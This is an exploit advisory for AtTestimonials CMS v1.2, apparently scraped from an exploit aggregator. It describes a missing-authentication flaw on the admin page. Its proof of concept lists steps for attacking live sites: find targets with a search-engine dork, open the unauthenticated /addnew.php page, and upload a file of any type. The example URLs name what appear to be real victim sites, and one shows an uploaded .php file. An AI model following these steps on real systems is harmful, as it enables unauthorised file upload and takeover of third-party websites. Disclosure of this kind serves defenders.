Share
## https://sploitus.com/exploit?id=PACKETSTORM:173420
====================================================================================================================================  
| # Title : AtTestimonials CMS v1.2 Missing Authentication Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |  
| # Vendor : http://www.dl.persianscript.ir/script/atmanager-system(PersianScript.ir).zip |  
| # Dork : © Copyright 2009 : All Rights Reserved Programmed and Developed by themeflash.com |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] appears to be missing authentication on the administrative interface  
  
[+] Use payload : /addnew.php  
  
[+] Add New Testimonials  
  
[+] http://wccpavingcouk/testimonials/addnew.php  
  
[+] Attach any file extension  
  
[+] http://dfwcarfixcom/testimonials/upload/084145ahmad.php  
  
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================